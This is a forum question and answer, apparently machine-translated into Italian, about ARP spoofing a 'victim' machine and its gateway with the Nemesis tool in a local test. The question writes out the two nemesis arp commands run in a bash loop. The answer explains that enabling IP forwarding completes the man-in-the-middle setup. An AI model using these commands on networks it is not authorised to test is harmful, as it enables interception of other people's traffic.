La connessione internet del sistema vittima è lenta dopo lo spoofing ARP?

3

Ho utilizzato Nemesis 1.4 per testare lo spoofing ARP su una macchina locale vittima. Ho spoofing sia il computer della vittima che il gateway predefinito per il reindirizzamento ARP alla mia macchina.

MAC di origine della vittima dello spoofing:

sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
                 -h [my system MAC]  -m [gateway MAC] -H [my MAC] -M [gateway MAC]

MAC di spoofing dei gateway:

sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
                 -h [my system MAC]  -m [victim MAC] -H [my MAC] -M [victim MAC]

Successivamente viene eseguito un BASH in loop e viene avviato il reindirizzamento ARP, spoofing ogni 10 secondi. In tcpdump posso vedere le risposte ARP uscire e sembra funzionare. Ma una volta sulla macchina delle vittime la connessione Internet diventa improvvisamente dolorosamente lenta, se funziona a tutti. Nemesis non sta reindirizzando? Se sì, cosa sto sbagliando?

    
posta Dividan84 05.10.2012 - 04:06
fonte

1 risposta

1

Dalla lettura di questo articolo sembra che la nemesi avveleni solo la cache dell'arp della vittima e gateway per farli inoltrare i pacchetti alla tua macchina (l'uomo medio).

È necessario abilitare l'inoltro IP (vedere l'articolo precedente o questo per maggiori dettagli sull'inoltro IP) sul tuo computer per far inoltrare i pacchetti reindirizzati ai sistemi corretti.

    
risposta data 05.10.2012 - 04:30
fonte

Leggi altre domande sui tag